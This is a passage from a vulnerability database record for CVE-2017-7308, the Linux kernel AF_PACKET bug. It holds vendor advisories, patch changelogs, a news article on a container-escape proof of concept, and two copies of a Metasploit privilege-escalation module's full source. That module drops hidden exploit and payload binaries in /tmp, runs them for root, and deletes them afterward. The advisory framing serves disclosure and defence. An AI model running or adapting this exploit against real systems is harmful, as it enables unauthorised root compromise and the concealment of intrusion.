Description\n\nUSN-3256-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel for each of the respective prior Ubuntu LTS releases.\n\nAndrey Konovalov discovered that the AF_PACKET implementation in the Linux kernel did not properly validate certain block-size data. A local attacker could use this to cause a denial of service (system crash).\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is high unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3151.x versions prior to 3151.15\n * 3233.x versions prior to 3233.17\n * 3263.x versions prior to 3263.23\n * 3312.x versions prior to 3312.23\n * 3363.x versions prior to 3363.15\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3151.x versions to 3151.15 or later\n * Upgrade 3233.x versions to 3233.17 or later\n * Upgrade 3263.x versions to 3263.23 or later\n * Upgrade 3312.x versions to 3312.23 or later\n * Upgrade 3363.x versions to 3363.15 or later\n * All other stemcells should be upgraded to the latest version.\n\n# References\n\n * [USN-3256-2](<http://www.ubuntu.com/usn/usn-3256-2/>)\n * [CVE-2017-7308](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-7308>)\n", "edition": 5, "modified": "2017-04-12T00:00:00", "published": "2017-04-12T00:00:00", "id": "CFOUNDRY:2DD582EFE729277C37B69440AE62247E", "href": "https://www.cloudfoundry.org/blog/usn-3256-2/", "title": "USN-3256-2: Linux kernel (HWE) vulnerability | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:15", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7308"], "description": "kernel-uek\n[4.1.12-94.3.6]\n- net/packet: fix overflow in check for tp_reserve (Andrey Konovalov) [Orabug: 26143545] {CVE-2017-7308}\n- net/packet: fix overflow in check for tp_frame_nr (Andrey Konovalov) [Orabug: 26143545] {CVE-2017-7308}\n- net/packet: fix overflow in check for priv area size (Andrey Konovalov) [Orabug: 26143545] {CVE-2017-7308}", "edition": 4, "modified": "2017-06-01T00:00:00", "published": "2017-06-01T00:00:00", "id": "ELSA-2017-3579", "href": "http://linux.oracle.com/errata/ELSA-2017-3579.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:16", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7308"], "description": "kernel-uek\n[3.8.13-118.18.4]\n- net/packet: fix overflow in check for tp_reserve (Andrey Konovalov) [Orabug: 26143552] {CVE-2017-7308}\n- net/packet: fix overflow in check for tp_frame_nr (Andrey Konovalov) [Orabug: 26143552] {CVE-2017-7308}\n- net/packet: fix overflow in check for priv area size (Andrey Konovalov) [Orabug: 26143552] {CVE-2017-7308}", "edition": 4, "modified": "2017-06-01T00:00:00", "published": "2017-06-01T00:00:00", "id": "ELSA-2017-3580", "href": "http://linux.oracle.com/errata/ELSA-2017-3580.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2021-02-07T00:24:15", "description": "This module exploits a heap-out-of-bounds write in the packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel to execute code as root (CVE-2017-7308). The bug was initially introduced in 2011 and patched in version 4.10.6, potentially affecting a large number of kernels; however this exploit targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46, including Linux distros based on Ubuntu Xenial, such as Linux Mint. The target system must have unprivileged user namespaces enabled and two or more CPU cores. Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation may crash the kernel. This module has been tested successfully on Linux Mint 18 (x86_64) with kernel versions: 4.8.0-34-generic; 4.8.0-36-generic; 4.8.0-39-generic; 4.8.0-41-generic; 4.8.0-42-generic; 4.8.0-44-generic; 4.8.0-45-generic.\n", "published": "2018-04-28T01:40:17", "type": "metasploit", "title": "AF_PACKET packet_set_ring Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7308"], "modified": "2021-02-02T10:15:46", "id": "MSF:EXPLOIT/LINUX/LOCAL/AF_PACKET_PACKET_SET_RING_PRIV_ESC/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'AF_PACKET packet_set_ring Privilege Escalation',\n 'Description' => %q{\n This module exploits a heap-out-of-bounds write in the packet_set_ring\n function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel\n to execute code as root (CVE-2017-7308).\n\n The bug was initially introduced in 2011 and patched in version 4.10.6,\n potentially affecting a large number of kernels; however this exploit\n targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46,\n including Linux distros based on Ubuntu Xenial, such as Linux Mint.\n\n The target system must have unprivileged user namespaces enabled and\n two or more CPU cores.\n\n Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation\n may crash the kernel.\n\n This module has been tested successfully on Linux Mint 18 (x86_64)\n with kernel versions:\n\n 4.8.0-34-generic;\n 4.8.0-36-generic;\n 4.8.0-39-generic;\n 4.8.0-41-generic;\n 4.8.0-42-generic;\n 4.8.0-44-generic;\n 4.8.0-45-generic.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Andrey Konovalov', # Discovery and C exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2017-03-29',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [[ 'Auto', {} ]],\n 'Privileged' => true,\n 'References' =>\n [\n [ 'EDB', '41994' ],\n [ 'CVE', '2017-7308' ],\n [ 'BID', '97234' ],\n [ 'URL', 'https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html' ],\n [ 'URL', 'https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308' ],\n [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7308.html', ],\n [ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c' ],\n [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/cve-2017-7308/CVE-2017-7308/poc.c' ]\n ],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_OS_DOWN ],\n },\n 'DefaultTarget' => 0))\n register_options [\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ])\n ]\n register_advanced_options [\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n write_file path, data\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n cmd_exec \"chmod +x '#{path}'\"\n end\n\n def upload_and_compile(path, data)\n upload \"#{path}.c\", data\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\n if session.type.eql? 'shell'\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\n end\n\n output = cmd_exec gcc_cmd\n unless output.blank?\n print_error output\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\n end\n\n cmd_exec \"chmod +x #{path}\"\n end\n\n def strip_comments(c_code)\n c_code.gsub(%r{/\\*.*?\\*/}m, '').gsub(%r{^\\s*//.*$}, '')\n end\n\n def exploit_data(file)\n ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-7308', file)\n end\n\n def live_compile?\n return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\n\n if has_gcc?\n vprint_good 'gcc is installed'\n return true\n end\n\n unless datastore['COMPILE'].eql? 'Auto'\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\n end\n end\n\n def check\n version = kernel_release\n unless version =~ /^4\\.8\\.0-(34|36|39|41|42|44|45)-generic/\n vprint_error \"Linux kernel version #{version} is not vulnerable\"\n return CheckCode::Safe\n end\n vprint_good \"Linux kernel version #{version} is vulnerable\"\n\n arch = kernel_hardware\n unless arch.include? 'x86_64'\n vprint_error \"System architecture #{arch} is not supported\"\n return CheckCode::Safe\n end\n vprint_good \"System architecture #{arch} is supported\"\n\n cores = get_cpu_info[:cores].to_i\n min_required_cores = 2\n unless cores >= min_required_cores\n vprint_error \"System has less than #{min_required_cores} CPU cores\"\n return CheckCode::Safe\n end\n vprint_good \"System has #{cores} CPU cores\"\n\n config = kernel_config\n if config.nil?\n vprint_error 'Could not retrieve kernel config'\n return CheckCode::Unknown\n end\n\n unless config.include? 'CONFIG_USER_NS=y'\n vprint_error 'Kernel config does not include CONFIG_USER_NS'\n return CheckCode::Safe\n end\n vprint_good 'Kernel config has CONFIG_USER_NS enabled'\n\n unless userns_enabled?\n vprint_error 'Unprivileged user namespaces are not permitted'\n return CheckCode::Safe\n end\n vprint_good 'Unprivileged user namespaces are permitted'\n\n if kptr_restrict? && dmesg_restrict?\n vprint_error 'Both kernel.kptr_restrict and kernel.dmesg_destrict are enabled. KASLR bypass will fail.'\n return CheckCode::Safe\n end\n\n if lkrg_installed?\n vprint_error 'LKRG is installed'\n return CheckCode::Safe\n end\n vprint_good 'LKRG is not installed'\n\n CheckCode::Appears\n end\n\n def exploit\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n # Upload exploit executable\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\n executable_path = \"#{base_dir}/#{executable_name}\"\n if live_compile?\n vprint_status 'Live compiling exploit on system...'\n upload_and_compile executable_path, strip_comments(exploit_data('poc.c'))\n rm_f \"#{executable_path}.c\"\n else\n vprint_status 'Dropping pre-compiled exploit on system...'\n upload_and_chmodx executable_path, exploit_data('exploit')\n end\n\n # Upload payload executable\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n # Launch exploit\n print_status 'Launching exploit...'\n output = cmd_exec \"#{executable_path} #{payload_path}\"\n output.each_line { |line| vprint_status line.chomp }\n print_status 'Deleting executable...'\n rm_f executable_path\n Rex.sleep 5\n print_status 'Deleting payload...'\n rm_f payload_path\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb"}, {"lastseen": "2020-10-07T20:01:03", "description": "This module exploits a heap-out-of-bounds write in the packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel to execute code as root (CVE-2017-7308). The bug was initially introduced in 2011 and patched in version 4.10.6, potentially affecting a large number of kernels; however this exploit targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46, including Linux distros based on Ubuntu Xenial, such as Linux Mint. The target system must have unprivileged user namespaces enabled and two or more CPU cores. Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation may crash the kernel. This module has been tested successfully on Linux Mint 18 (x86_64) with kernel versions: 4.8.0-34-generic; 4.8.0-36-generic; 4.8.0-39-generic; 4.8.0-41-generic; 4.8.0-42-generic; 4.8.0-44-generic; 4.8.0-45-generic.\n", "published": "2018-04-28T01:40:17", "type": "metasploit", "title": "AF_PACKET packet_set_ring Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7308"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/LOCAL/AF_PACKET_PACKET_SET_RING_PRIV_ESC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'AF_PACKET packet_set_ring Privilege Escalation',\n 'Description' => %q{\n This module exploits a heap-out-of-bounds write in the packet_set_ring\n function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel\n to execute code as root (CVE-2017-7308).\n\n The bug was initially introduced in 2011 and patched in version 4.10.6,\n potentially affecting a large number of kernels; however this exploit\n targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46,\n including Linux distros based on Ubuntu Xenial, such as Linux Mint.\n\n The target system must have unprivileged user namespaces enabled and\n two or more CPU cores.\n\n Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation\n may crash the kernel.\n\n This module has been tested successfully on Linux Mint 18 (x86_64)\n with kernel versions:\n\n 4.8.0-34-generic;\n 4.8.0-36-generic;\n 4.8.0-39-generic;\n 4.8.0-41-generic;\n 4.8.0-42-generic;\n 4.8.0-44-generic;\n 4.8.0-45-generic.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Andrey Konovalov', # Discovery and C exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2017-03-29',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [[ 'Auto', {} ]],\n 'Privileged' => true,\n 'References' =>\n [\n [ 'EDB', '41994' ],\n [ 'CVE', '2017-7308' ],\n [ 'BID', '97234' ],\n [ 'URL', 'https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html' ],\n [ 'URL', 'https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308' ],\n [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7308.html', ],\n [ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c' ],\n [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/cve-2017-7308/CVE-2017-7308/poc.c' ]\n ],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_OS_DOWN ],\n },\n 'DefaultTarget' => 0))\n register_options [\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [ false, 'Override check result', false ]),\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n write_file path, data\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n cmd_exec \"chmod +x '#{path}'\"\n end\n\n def upload_and_compile(path, data)\n upload \"#{path}.c\", data\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\n if session.type.eql? 'shell'\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\n end\n\n output = cmd_exec gcc_cmd\n unless output.blank?\n print_error output\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\n end\n\n cmd_exec \"chmod +x #{path}\"\n end\n\n def strip_comments(c_code)\n c_code.gsub(%r{/\\*.*?\\*/}m, '').gsub(%r{^\\s*//.*$}, '')\n end\n\n def exploit_data(file)\n ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-7308', file)\n end\n\n def live_compile?\n return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\n\n if has_gcc?\n vprint_good 'gcc is installed'\n return true\n end\n\n unless datastore['COMPILE'].eql? 'Auto'\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\n end\n end\n\n def check\n version = kernel_release\n unless version =~ /^4\\.8\\.0-(34|36|39|41|42|44|45)-generic/\n vprint_error \"Linux kernel version #{version} is not vulnerable\"\n return CheckCode::Safe\n end\n vprint_good \"Linux kernel version #{version} is vulnerable\"\n\n arch = kernel_hardware\n unless arch.include? 'x86_64'\n vprint_error \"System architecture #{arch} is not supported\"\n return CheckCode::Safe\n end\n vprint_good \"System architecture #{arch} is supported\"\n\n cores = get_cpu_info[:cores].to_i\n min_required_cores = 2\n unless cores >= min_required_cores\n vprint_error \"System has less than #{min_required_cores} CPU cores\"\n return CheckCode::Safe\n end\n vprint_good \"System has #{cores} CPU cores\"\n\n config = kernel_config\n if config.nil?\n vprint_error 'Could not retrieve kernel config'\n return CheckCode::Unknown\n end\n\n unless config.include? 'CONFIG_USER_NS=y'\n vprint_error 'Kernel config does not include CONFIG_USER_NS'\n return CheckCode::Safe\n end\n vprint_good 'Kernel config has CONFIG_USER_NS enabled'\n\n unless userns_enabled?\n vprint_error 'Unprivileged user namespaces are not permitted'\n return CheckCode::Safe\n end\n vprint_good 'Unprivileged user namespaces are permitted'\n\n if kptr_restrict? && dmesg_restrict?\n vprint_error 'Both kernel.kptr_restrict and kernel.dmesg_destrict are enabled. KASLR bypass will fail.'\n return CheckCode::Safe\n end\n\n if lkrg_installed?\n vprint_error 'LKRG is installed'\n return CheckCode::Safe\n end\n vprint_good 'LKRG is not installed'\n\n CheckCode::Appears\n end\n\n def exploit\n unless check == CheckCode::Appears\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n # Upload exploit executable\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\n executable_path = \"#{base_dir}/#{executable_name}\"\n if live_compile?\n vprint_status 'Live compiling exploit on system...'\n upload_and_compile executable_path, strip_comments(exploit_data('poc.c'))\n rm_f \"#{executable_path}.c\"\n else\n vprint_status 'Dropping pre-compiled exploit on system...'\n upload_and_chmodx executable_path, exploit_data('exploit')\n end\n\n # Upload payload executable\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n # Launch exploit\n print_status 'Launching exploit...'\n output = cmd_exec \"#{executable_path} #{payload_path}\"\n output.each_line { |line| vprint_status line.chomp }\n print_status 'Deleting executable...'\n rm_f executable_path\n Rex.sleep 5\n print_status 'Deleting payload...'\n rm_f payload_path\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb"}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5967", "CVE-2017-5970"], "description": "The kernel meta package ", "modified": "2017-02-20T19:20:59", "published": "2017-02-20T19:20:59", "id": "FEDORA:79A0B6175384", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: kernel-4.9.10-100.fc24", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5967", "CVE-2017-5970"], "description": "The kernel meta package ", "modified": "2017-02-20T18:55:36", "published": "2017-02-20T18:55:36", "id": "FEDORA:3D3EF633571E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: kernel-4.9.10-200.fc25", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "threatpost": [{"lastseen": "2019-11-12T07:13:15", "bulletinFamily": "info", "cvelist": ["CVE-2017-7308", "CVE-2019-5736"], "description": "Researchers at CyberArk have created a proof-of-concept attack that allows adversaries to bypass container security, escape the container and compromise an entire host system. However, the attack scenario is limited, in that a successful attack depends on unpatched vulnerabilities to be present in the host system.\n\nCyberArk, which is presenting research here at the [RSA Conference on Thursday](<https://threatpost.com/microsite/rsa-conference-2019-show-coverage/>), said their technique works with a raft of exploits. \u201cWith about 20 lines of code and a few small tweaks to an exploit, we have created a way to jump a contain and attack the underlying host,\u201d said Nimrod Stoler, a cyber security researcher with CyberArk.\n\nOutlined in research disclosed on Monday, CyberArk describes how a Linux privilege escalation vulnerability (CVE-2017-7308) that exists on a host system could be exploited. The attack scenario includes an adversary infecting a website running inside a container. Once the website is compromised, the hacker can use the CyberArk proof-of-concept technique to break containment and infect the host. From there, the criminal owns the environment and can either pillage other co-hosted containers or try to move laterally within a corporate network, said CyberArk security researcher Lavi Lazarovitz. \n[](<https://threatpost.com/newsletter-sign/>) \n\u201cIn our proof-of-concept attack, the Docker containers\u2019 defense-in-depth strategy temporarily stopped us from escaping to the underlying host. But, we expanded the exploit\u2019s payload to include code that manipulated the container\u2019s namespaces and eventually breaking containment,\u201d Lazarovitz said.\n\nDocker containers employ a number of security measures to protect a kernel shared by the container and host and its supporting namespaces and cgroups. Namespaces are a core feature in the Linux kernel that provide a layer of isolation for containers. Cgroups (or control groups) allow the Docker engine to share hardware resources such as memory.\n\nThe CyberArk proof-of-concept attack involved first overwriting a container\u2019s namespace (process 1) with the host\u2019s namespaces. \u201cThe exploit finishes by calling the setns syscall, which changes the current process\u2019s namespaces into process 1\u2019s and the host\u2019s namespaces, practically tearing down the namespace walls between container and host and accomplishing a full escape to host,\u201d CyberArk describes in a technical write-up to be published later this week.\n\nDocker, the company behind the virtualization program that creates containers, said any host system that isn\u2019t fully patched and running containers may become infected \u2013 no matter the security provisions of the container.\n\n\u201cContainers don\u2019t help if the kernel is broken. As is the case with any software, if you haven\u2019t installed security updates for two years, you will be vulnerable,\u201d Docker said in a statement to Threatpost.\n\nCyberArk\u2019s researchers agree, to a point. Researchers point out that the highlighted proof-of-concept vulnerability (CVE-2017-7308) is one of many that can be easily adapted, with 20 lines of code, to escape a container and attack a vulnerable host.\n\n\u201cWe think that there is more to do to allow better isolation between container and their hosts,\u201d Stoler told Threatpost. According to the report CyberArk\u2019s proof-of-concept code can be used in any future privilege escalation vulnerability found in the Linux kernel to escape a containerized environment.\n\nLast month, Docker patched a container-escape bug ([CVE-2019-5736](<https://nvd.nist.gov/vuln/detail/CVE-2019-5736>)) found by researcher Adam Iwaniuk tied to a flaw in runC, a container management tool. In January, [CyberArk hacked the Docker test platform called Play-with-Docker](<https://threatpost.com/hack-allows-escape-of-play-with-docker-containers/140831/>), allowing them to access data and manipulate any test Docker containers running on the host system.\n\n_**For all Threatpost\u2019s RSA Conference 2019 coverage, please visit our special coverage section, [available here](<https://threatpost.com/microsite/rsa-conference-2019-show-coverage>). **_\n", "modified": "2019-03-04T13:30:17", "published": "2019-03-04T13:30:17", "id": "THREATPOST:1EFFF77A39E186D173F6DF0D1259D4DE", "href": "https://threatpost.com/container-escape-hack-targets-vulnerable-linux-kernel/142407/", "type": "threatpost", "title": "RSAC 2019: Container Escape Hack Targets Vulnerable Linux Kernel", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}